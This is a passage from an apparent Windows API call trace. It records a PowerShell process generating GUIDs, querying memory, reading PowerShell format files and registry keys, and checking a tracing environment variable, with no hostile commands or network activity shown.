pguid=0x1acff0*(Data1=0x1452d1bf, Data2=0x583d, Data3=0x4450, Data4=([0]=0x80, [1]=0x8b, [2]=0x1d, [3]=0xf, [4]=0xc8, [5]=0xad, [6]=0xdf, [7]=0x4))) returned 0x0 [0103.423] VirtualQuery (in: lpAddress=0x1ab9a0, lpBuffer=0x1ac860, dwLength=0x30 | out: lpBuffer=0x1ac860*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.423] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x919b2ea2, Data2=0xf91b, Data3=0x4897, Data4=([0]=0xac, [1]=0xee, [2]=0x69, [3]=0xd4, [4]=0xee, [5]=0x77, [6]=0x70, [7]=0x98))) returned 0x0 [0103.423] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x614574ec, Data2=0xd276, Data3=0x41f4, Data4=([0]=0x9c, [1]=0x5d, [2]=0xb1, [3]=0x8d, [4]=0x5b, [5]=0x58, [6]=0xf, [7]=0x1a))) returned 0x0 [0103.423] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x93666993, Data2=0xffca, Data3=0x409c, Data4=([0]=0xaa, [1]=0x68, [2]=0xa, [3]=0x98, [4]=0xc4, [5]=0x22, [6]=0x7a, [7]=0xe3))) returned 0x0 [0103.423] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xf48e88f2, Data2=0x6659, Data3=0x41a2, Data4=([0]=0xa0, [1]=0xf2, [2]=0xfb, [3]=0xd1, [4]=0xde, [5]=0xa1, [6]=0x15, [7]=0xed))) returned 0x0 [0103.423] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xa7ce6e7d, Data2=0x43f5, Data3=0x42e8, Data4=([0]=0x85, [1]=0xa1, [2]=0x2f, [3]=0xb2, [4]=0x5b, [5]=0x5e, [6]=0x88, [7]=0x8b))) returned 0x0 [0103.423] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xdaa2045c, Data2=0xf932, Data3=0x4e27, Data4=([0]=0x97, [1]=0xce, [2]=0xed, [3]=0x56, [4]=0xdc, [5]=0x4b, [6]=0xd3, [7]=0x83))) returned 0x0 [0103.424] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x661f9ed2, Data2=0x1868, Data3=0x40d4, Data4=([0]=0xb6, [1]=0x44, [2]=0xb7, [3]=0x88, [4]=0x21, [5]=0xd8, [6]=0xd5, [7]=0x86))) returned 0x0 [0103.424] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xf8dc1ff0, Data2=0xc080, Data3=0x418b, Data4=([0]=0xa7, [1]=0xde, [2]=0xd6, [3]=0x97, [4]=0x99, [5]=0xc9, [6]=0x2d, [7]=0x38))) returned 0x0 [0103.424] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x4b45e5e0, Data2=0xb950, Data3=0x4374, Data4=([0]=0x89, [1]=0x47, [2]=0x26, [3]=0x22, [4]=0x64, [5]=0x77, [6]=0xcf, [7]=0x4a))) returned 0x0 [0103.424] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xf0efccc3, Data2=0x2b36, Data3=0x45dd, Data4=([0]=0x8d, [1]=0xda, [2]=0xbb, [3]=0x59, [4]=0x17, [5]=0xad, [6]=0xee, [7]=0xef))) returned 0x0 [0103.424] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x58da42f1, Data2=0xe1c4, Data3=0x4ae0, Data4=([0]=0xac, [1]=0x12, [2]=0xd7, [3]=0x60, [4]=0x87, [5]=0x23, [6]=0x34, [7]=0xa7))) returned 0x0 [0103.424] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xb3ac2b22, Data2=0xb4e9, Data3=0x46de, Data4=([0]=0x9f, [1]=0x98, [2]=0x87, [3]=0xfb, [4]=0x76, [5]=0x16, [6]=0xdf, [7]=0x69))) returned 0x0 [0103.425] VirtualQuery (in: lpAddress=0x1ab9a0, lpBuffer=0x1ac860, dwLength=0x30 | out: lpBuffer=0x1ac860*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.425] VirtualQuery (in: lpAddress=0x1ab9a0, lpBuffer=0x1ac860, dwLength=0x30 | out: lpBuffer=0x1ac860*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.425] VirtualQuery (in: lpAddress=0x1ab9a0, lpBuffer=0x1ac860, dwLength=0x30 | out: lpBuffer=0x1ac860*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.425] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x9826802b, Data2=0x1a14, Data3=0x40f3, Data4=([0]=0xa2, [1]=0x4e, [2]=0x25, [3]=0x5a, [4]=0x81, [5]=0xb3, [6]=0x6a, [7]=0xdc))) returned 0x0 [0103.425] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xa2091e09, Data2=0x1460, Data3=0x4eac, Data4=([0]=0xb0, [1]=0xbb, [2]=0x53, [3]=0xb2, [4]=0x19, [5]=0xa9, [6]=0x54, [7]=0x1e))) returned 0x0 [0103.426] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x32dd67db, Data2=0x5288, Data3=0x4a15, Data4=([0]=0xb5, [1]=0xa4, [2]=0x7f, [3]=0xdd, [4]=0x9f, [5]=0x23, [6]=0x1a, [7]=0x35))) returned 0x0 [0103.426] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xb53ed5e8, Data2=0x7749, Data3=0x4161, Data4=([0]=0xa5, [1]=0x40, [2]=0x69, [3]=0xe5, [4]=0x1e, [5]=0xda, [6]=0x96, [7]=0xa3))) returned 0x0 [0103.426] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x9a0377b6, Data2=0x3d4e, Data3=0x4e74, Data4=([0]=0xbc, [1]=0xf0, [2]=0x1a, [3]=0x6a, [4]=0x84, [5]=0x54, [6]=0x37, [7]=0x41))) returned 0x0 [0103.426] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x4e675567, Data2=0xa658, Data3=0x40aa, Data4=([0]=0xbe, [1]=0x5a, [2]=0x60, [3]=0x76, [4]=0x52, [5]=0x85, [6]=0x51, [7]=0x2d))) returned 0x0 [0103.426] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x455a5be, Data2=0xe603, Data3=0x487a, Data4=([0]=0xa9, [1]=0x34, [2]=0xa4, [3]=0x6d, [4]=0x8b, [5]=0xd9, [6]=0x7, [7]=0xe9))) returned 0x0 [0103.426] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xa074fc6f, Data2=0x2d0e, Data3=0x41d8, Data4=([0]=0x82, [1]=0xbc, [2]=0x7b, [3]=0x1d, [4]=0x34, [5]=0x6, [6]=0x7f, [7]=0x92))) returned 0x0 [0103.426] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x53ac41f7, Data2=0xe193, Data3=0x4d7c, Data4=([0]=0x93, [1]=0x6d, [2]=0xa7, [3]=0xeb, [4]=0xb0, [5]=0xe0, [6]=0xb5, [7]=0xf5))) returned 0x0 [0103.427] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x3c3ced9f, Data2=0x6530, Data3=0x4dea, Data4=([0]=0x88, [1]=0xb3, [2]=0x6e, [3]=0x44, [4]=0xfc, [5]=0xba, [6]=0x78, [7]=0x47))) returned 0x0 [0103.427] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x3b956a49, Data2=0x897a, Data3=0x49e3, Data4=([0]=0xa5, [1]=0xcf, [2]=0x25, [3]=0x2f, [4]=0x41, [5]=0x10, [6]=0xd1, [7]=0xbd))) returned 0x0 [0103.427] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xd2eb2a83, Data2=0x75ae, Data3=0x4224, Data4=([0]=0xb7, [1]=0x5b, [2]=0xd1, [3]=0x85, [4]=0x6a, [5]=0x6d, [6]=0x94, [7]=0x85))) returned 0x0 [0103.427] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xed7b28c0, Data2=0xec19, Data3=0x4429, Data4=([0]=0x9b, [1]=0x5a, [2]=0xa7, [3]=0x38, [4]=0xca, [5]=0xd8, [6]=0x44, [7]=0x76))) returned 0x0 [0103.427] VirtualQuery (in: lpAddress=0x1ab9a0, lpBuffer=0x1ac860, dwLength=0x30 | out: lpBuffer=0x1ac860*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.427] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xea83b4cd, Data2=0x279e, Data3=0x4177, Data4=([0]=0x9b, [1]=0x8, [2]=0xe3, [3]=0xef, [4]=0x12, [5]=0x9f, [6]=0x61, [7]=0xcb))) returned 0x0 [0103.427] VirtualQuery (in: lpAddress=0x1ab9a0, lpBuffer=0x1ac860, dwLength=0x30 | out: lpBuffer=0x1ac860*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.429] VirtualQuery (in: lpAddress=0x1ab9a0, lpBuffer=0x1ac860, dwLength=0x30 | out: lpBuffer=0x1ac860*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.430] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x4a3465c7, Data2=0xdedd, Data3=0x45f0, Data4=([0]=0xaa, [1]=0xa, [2]=0xb7, [3]=0x2d, [4]=0x2e, [5]=0xe3, [6]=0xbd, [7]=0xf9))) returned 0x0 [0103.430] VirtualQuery (in: lpAddress=0x1ab9a0, lpBuffer=0x1ac860, dwLength=0x30 | out: lpBuffer=0x1ac860*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.431] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x5085e1f8, Data2=0x28c4, Data3=0x4b22, Data4=([0]=0xb5, [1]=0xe4, [2]=0xfc, [3]=0x10, [4]=0x6f, [5]=0x2e, [6]=0x2e, [7]=0x39))) returned 0x0 [0103.431] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x5b175784, Data2=0x21a5, Data3=0x431b, Data4=([0]=0x89, [1]=0x9a, [2]=0x6, [3]=0x78, [4]=0x1, [5]=0xa1, [6]=0xa3, [7]=0x41))) returned 0x0 [0103.431] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xb440de5f, Data2=0x4407, Data3=0x4ba8, Data4=([0]=0x8f, [1]=0x36, [2]=0xb1, [3]=0xbc, [4]=0x39, [5]=0x77, [6]=0x2d, [7]=0x91))) returned 0x0 [0103.431] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x60c0fa8f, Data2=0xe173, Data3=0x4fcc, Data4=([0]=0x8b, [1]=0xa8, [2]=0x70, [3]=0xd, [4]=0x28, [5]=0x6a, [6]=0x7c, [7]=0x6d))) returned 0x0 [0103.431] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x1ab416e9, Data2=0xa0a9, Data3=0x428c, Data4=([0]=0xaa, [1]=0x22, [2]=0x4d, [3]=0xb0, [4]=0x31, [5]=0xa9, [6]=0x3d, [7]=0x63))) returned 0x0 [0103.432] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x86500dbe, Data2=0xc571, Data3=0x42b0, Data4=([0]=0x95, [1]=0x49, [2]=0x77, [3]=0x25, [4]=0xd0, [5]=0x11, [6]=0xdf, [7]=0xb1))) returned 0x0 [0103.432] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x8ec8024c, Data2=0xa9ee, Data3=0x4083, Data4=([0]=0x83, [1]=0x92, [2]=0x6d, [3]=0x74, [4]=0xcc, [5]=0x2c, [6]=0xbf, [7]=0x72))) returned 0x0 [0103.432] VirtualQuery (in: lpAddress=0x1ab9a0, lpBuffer=0x1ac860, dwLength=0x30 | out: lpBuffer=0x1ac860*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.432] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x6d16ec8e, Data2=0xde79, Data3=0x43f1, Data4=([0]=0x92, [1]=0xc2, [2]=0xd2, [3]=0x2f, [4]=0x72, [5]=0xff, [6]=0x8a, [7]=0x69))) returned 0x0 [0103.432] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x57c11510, Data2=0xe78a, Data3=0x42fa, Data4=([0]=0xad, [1]=0xfa, [2]=0x2f, [3]=0x3a, [4]=0x56, [5]=0x56, [6]=0xa3, [7]=0x2f))) returned 0x0 [0103.433] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x58fa34ac, Data2=0xbfd2, Data3=0x4dcd, Data4=([0]=0x82, [1]=0x1c, [2]=0xf5, [3]=0x72, [4]=0x7d, [5]=0x11, [6]=0x21, [7]=0x9))) returned 0x0 [0103.433] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xa9ba15bb, Data2=0xa11, Data3=0x4af5, Data4=([0]=0xa9, [1]=0x81, [2]=0xca, [3]=0x43, [4]=0xbf, [5]=0xe, [6]=0x73, [7]=0x6a))) returned 0x0 [0103.433] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xf7c4ea0a, Data2=0x4c02, Data3=0x46e2, Data4=([0]=0xbe, [1]=0x73, [2]=0x35, [3]=0x1a, [4]=0xfd, [5]=0xdc, [6]=0x24, [7]=0x4a))) returned 0x0 [0103.433] VirtualQuery (in: lpAddress=0x1ab9a0, lpBuffer=0x1ac860, dwLength=0x30 | out: lpBuffer=0x1ac860*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.433] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x7534a281, Data2=0xb015, Data3=0x472f, Data4=([0]=0xb3, [1]=0x91, [2]=0xe0, [3]=0x3d, [4]=0x6e, [5]=0x3f, [6]=0x21, [7]=0x6a))) returned 0x0 [0103.434] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xe29fba42, Data2=0x4928, Data3=0x4598, Data4=([0]=0x8a, [1]=0x9b, [2]=0xb1, [3]=0x5f, [4]=0xa5, [5]=0x1c, [6]=0x57, [7]=0x66))) returned 0x0 [0103.434] VirtualQuery (in: lpAddress=0x1aba10, lpBuffer=0x1ac8d0, dwLength=0x30 | out: lpBuffer=0x1ac8d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.434] VirtualQuery (in: lpAddress=0x1aba10, lpBuffer=0x1ac8d0, dwLength=0x30 | out: lpBuffer=0x1ac8d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.434] VirtualQuery (in: lpAddress=0x1aba10, lpBuffer=0x1ac8d0, dwLength=0x30 | out: lpBuffer=0x1ac8d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.434] VirtualQuery (in: lpAddress=0x1aba10, lpBuffer=0x1ac8d0, dwLength=0x30 | out: lpBuffer=0x1ac8d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.434] SetErrorMode (uMode=0x1) returned 0x1 [0103.435] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308 [0103.435] SetErrorMode (uMode=0x1) returned 0x1 [0103.435] GetFileType (hFile=0x308) returned 0x1 [0103.435] ReadFile (in: hFile=0x308, lpBuffer=0x3af83e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3af83e0*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.436] ReadFile (in: hFile=0x308, lpBuffer=0x3af83e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3af83e0*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.436] ReadFile (in: hFile=0x308, lpBuffer=0x3af83e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3af83e0*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.436] ReadFile (in: hFile=0x308, lpBuffer=0x3af83e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3af83e0*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.437] ReadFile (in: hFile=0x308, lpBuffer=0x3af83e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3af83e0*, lpNumberOfBytesRead=0x1acd38*=0x8b4, lpOverlapped=0x0) returned 1 [0103.437] ReadFile (in: hFile=0x308, lpBuffer=0x3af77fc, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3af77fc*, lpNumberOfBytesRead=0x1acd38*=0x0, lpOverlapped=0x0) returned 1 [0103.437] ReadFile (in: hFile=0x308, lpBuffer=0x3af83e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3af83e0*, lpNumberOfBytesRead=0x1acd38*=0x0, lpOverlapped=0x0) returned 1 [0103.437] SetErrorMode (uMode=0x1) returned 0x1 [0103.437] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1acce0 | out: lpFileInformation=0x1acce0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0103.437] SetErrorMode (uMode=0x1) returned 0x1 [0103.438] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acdc8 | out: phkResult=0x1acdc8*=0x308) returned 0x0 [0103.438] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acd4c, lpData=0x0, lpcbData=0x1acd48*=0x0 | out: lpType=0x1acd4c*=0x1, lpData=0x0, lpcbData=0x1acd48*=0x56) returned 0x0 [0103.438] CoTaskMemAlloc (cb=0x5a) returned 0x1b753fe0 [0103.438] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acd1c, lpData=0x1b753fe0, lpcbData=0x1acd18*=0x56 | out: lpType=0x1acd1c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1acd18*=0x56) returned 0x0 [0103.438] CoTaskMemFree (pv=0x1b753fe0) [0103.438] RegCloseKey (hKey=0x308) returned 0x0 [0103.439] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x57c96266, Data2=0x49b1, Data3=0x40ce, Data4=([0]=0xbe, [1]=0x95, [2]=0xb0, [3]=0x66, [4]=0x80, [5]=0xdb, [6]=0xcb, [7]=0x53))) returned 0x0 [0103.439] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x377e5fe0, Data2=0xeac1, Data3=0x4bdd, Data4=([0]=0x8a, [1]=0xe1, [2]=0x89, [3]=0x2f, [4]=0xc2, [5]=0x79, [6]=0x12, [7]=0x9d))) returned 0x0 [0103.439] SetErrorMode (uMode=0x1) returned 0x1 [0103.439] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308 [0103.439] SetErrorMode (uMode=0x1) returned 0x1 [0103.439] GetFileType (hFile=0x308) returned 0x1 [0103.439] ReadFile (in: hFile=0x308, lpBuffer=0x3b361c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3b361c8*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.440] ReadFile (in: hFile=0x308, lpBuffer=0x3b361c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3b361c8*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.441] ReadFile (in: hFile=0x308, lpBuffer=0x3b361c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3b361c8*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.441] ReadFile (in: hFile=0x308, lpBuffer=0x3b361c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3b361c8*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.442] ReadFile (in: hFile=0x308, lpBuffer=0x3b361c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3b361c8*, lpNumberOfBytesRead=0x1acd38*=0xe98, lpOverlapped=0x0) returned 1 [0103.442] ReadFile (in: hFile=0x308, lpBuffer=0x3b357c8, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3b357c8*, lpNumberOfBytesRead=0x1acd38*=0x0, lpOverlapped=0x0) returned 1 [0103.442] ReadFile (in: hFile=0x308, lpBuffer=0x3b361c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3b361c8*, lpNumberOfBytesRead=0x1acd38*=0x0, lpOverlapped=0x0) returned 1 [0103.442] SetErrorMode (uMode=0x1) returned 0x1 [0103.442] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1acce0 | out: lpFileInformation=0x1acce0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0103.442] SetErrorMode (uMode=0x1) returned 0x1 [0103.442] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acdc8 | out: phkResult=0x1acdc8*=0x308) returned 0x0 [0103.442] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acd4c, lpData=0x0, lpcbData=0x1acd48*=0x0 | out: lpType=0x1acd4c*=0x1, lpData=0x0, lpcbData=0x1acd48*=0x56) returned 0x0 [0103.443] CoTaskMemAlloc (cb=0x5a) returned 0x1b753fe0 [0103.443] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acd1c, lpData=0x1b753fe0, lpcbData=0x1acd18*=0x56 | out: lpType=0x1acd1c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1acd18*=0x56) returned 0x0 [0103.443] CoTaskMemFree (pv=0x1b753fe0) [0103.443] RegCloseKey (hKey=0x308) returned 0x0 [0103.444] VirtualQuery (in: lpAddress=0x1ab860, lpBuffer=0x1ac720, dwLength=0x30 | out: lpBuffer=0x1ac720*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.444] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x6e48b9ed, Data2=0x14e0, Data3=0x4b80, Data4=([0]=0xb5, [1]=0xec, [2]=0x6a, [3]=0xf3, [4]=0x15, [5]=0x7d, [6]=0xe1, [7]=0xd6))) returned 0x0 [0103.444] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xaf9a6b9, Data2=0x16fe, Data3=0x424d, Data4=([0]=0x93, [1]=0x77, [2]=0xc9, [3]=0x30, [4]=0x8d, [5]=0xac, [6]=0x18, [7]=0xb7))) returned 0x0 [0103.490] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0103.490] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.490] CoTaskMemFree (pv=0x1b7400b0) [0103.490] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0103.490] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.490] CoTaskMemFree (pv=0x1b7400b0) [0103.491] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0103.491] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.491] CoTaskMemFree (pv=0x1b7400b0) [0103.491] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0103.491] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.491] CoTaskMemFree (pv=0x1b7400b0) [0103.494] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0103.494] GetEnvironmentVariableW 